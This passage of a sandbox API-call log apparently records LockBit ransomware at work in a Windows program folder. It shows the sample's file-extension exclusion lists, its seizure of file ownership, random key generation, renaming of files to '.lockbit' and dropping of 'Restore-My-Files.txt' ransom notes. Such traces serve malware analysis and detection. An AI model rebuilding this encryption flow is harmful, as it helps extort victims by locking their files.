lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.598] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.598] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-next-static.png") returned 1 [0092.598] lstrcmpiW (lpString1="ntldr", lpString2="btn-next-static.png") returned 1 [0092.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-next-static.png") returned 1 [0092.598] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-next-static.png") returned -1 [0092.598] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-next-static.png") returned -1 [0092.598] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-next-static.png") returned 1 [0092.598] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-next-static.png") returned 1 [0092.598] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.598] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png") returned=".png" [0092.598] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.598] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.599] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.599] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.599] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.600] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.600] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.lockbit") returned 79 [0092.600] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.613] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.615] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.615] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.616] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.617] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.617] RtlFreeAnsiString (AnsiString="\\") [0092.617] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0092.618] malloc (_Size=0x200) returned 0x77d800 [0092.618] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.618] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.618] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.618] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.618] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.619] CloseHandle (hObject=0x13d8) returned 1 [0092.619] free (_Block=0x77d800) [0092.619] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0092.619] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.619] malloc (_Size=0x40068) returned 0x3df0128 [0092.621] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=8120) returned 1 [0092.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0092.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0092.628] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0092.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.631] malloc (_Size=0xb4) returned 0x77d800 [0092.631] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0092.632] free (_Block=0x77d800) [0092.632] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.632] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.632] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.632] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x20d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0092.632] lstrcmpiW (lpString1=".", lpString2="btn-previous-static.png") returned -1 [0092.632] lstrcmpiW (lpString1="..", lpString2="btn-previous-static.png") returned -1 [0092.632] PathFindExtensionW (pszPath="btn-previous-static.png") returned=".png" [0092.633] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.633] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.633] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.633] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.633] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.634] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.634] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.635] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-previous-static.png") returned 1 [0092.635] lstrcmpiW (lpString1="ntldr", lpString2="btn-previous-static.png") returned 1 [0092.635] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-previous-static.png") returned 1 [0092.635] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-previous-static.png") returned -1 [0092.635] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-previous-static.png") returned -1 [0092.635] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-previous-static.png") returned 1 [0092.635] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-previous-static.png") returned 1 [0092.635] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.635] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png") returned=".png" [0092.635] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.635] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.635] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.635] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.636] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.636] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.636] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.lockbit") returned 83 [0092.637] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.638] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.640] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.641] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.642] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.645] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.645] RtlFreeAnsiString (AnsiString="\\") [0092.645] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.645] malloc (_Size=0x200) returned 0x77d800 [0092.645] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.645] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.645] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.645] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.646] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.646] CloseHandle (hObject=0x13dc) returned 1 [0092.647] free (_Block=0x77d800) [0092.647] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.647] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.647] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.647] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8406) returned 1 [0092.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.653] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.666] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.666] malloc (_Size=0xbc) returned 0x77d800 [0092.666] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0092.667] free (_Block=0x77d800) [0092.667] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.667] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.667] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.667] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-bullet.png", cAlternateFileName="")) returned 1 [0092.667] lstrcmpiW (lpString1=".", lpString2="button-bullet.png") returned -1 [0092.667] lstrcmpiW (lpString1="..", lpString2="button-bullet.png") returned -1 [0092.667] PathFindExtensionW (pszPath="button-bullet.png") returned=".png" [0092.667] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.667] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.667] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.667] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.668] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.668] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.668] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.668] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.669] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.669] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="button-bullet.png") returned 1 [0092.670] lstrcmpiW (lpString1="ntldr", lpString2="button-bullet.png") returned 1 [0092.670] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="button-bullet.png") returned 1 [0092.670] lstrcmpiW (lpString1="bootsect.bak", lpString2="button-bullet.png") returned -1 [0092.670] lstrcmpiW (lpString1="autorun.inf", lpString2="button-bullet.png") returned -1 [0092.670] lstrcmpiW (lpString1="thumbs.db", lpString2="button-bullet.png") returned 1 [0092.670] lstrcmpiW (lpString1="iconcache.db", lpString2="button-bullet.png") returned 1 [0092.670] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.670] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png") returned=".png" [0092.670] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.670] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.815] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.815] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.815] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.815] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.815] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.816] lstrcmpiW 